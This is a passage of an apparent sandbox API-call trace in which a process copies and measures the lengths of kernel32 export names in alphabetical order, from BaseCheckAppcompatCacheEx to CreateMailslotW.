lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.976] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.976] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.976] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.976] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.976] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.976] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.976] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.976] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.976] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.976] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.976] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.976] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.976] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.976] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.976] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.976] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.976] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.976] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.976] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.977] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.977] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.977] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.977] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.977] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.977] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.977] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.977] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.977] lstrlenA (lpString="BEEP") returned 4 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.977] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.977] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.977] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.977] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.977] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.977] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.977] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.977] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.977] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.977] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.978] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.978] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.978] lstrlenA (lpString="CANCELIO") returned 8 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.978] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.978] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.978] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.978] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.978] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.978] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.978] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.978] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.978] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.978] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.978] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.978] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.978] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.978] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.978] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.978] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.979] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.979] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.979] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.979] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.979] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.979] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.979] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.979] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.979] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.979] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.979] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.979] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.979] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.979] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.979] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.979] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.979] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.979] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.979] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.979] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.980] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.980] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.980] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.980] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.980] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.980] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.980] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.980] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.980] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.980] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.980] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.980] lstrlenA (lpString="COPYFILEA") returned 9 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.980] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.980] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.980] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.980] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.980] lstrlenA (lpString="COPYFILEW") returned 9 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.980] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.980] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.981] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.981] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.981] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.981] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.981] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.981] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.981] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.981] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.981] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.981] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.981] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.981] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.981] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.981] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.981] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.981] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.981] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.981] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.981] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.981] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.982] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.982] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.982] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.982] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.982] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.982] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.982] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.982] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.982] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.982] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.982] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.982] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.982] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.982] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.982] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.982] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.982] lstrlenA (lpString="CREATEMAILSLOTW") 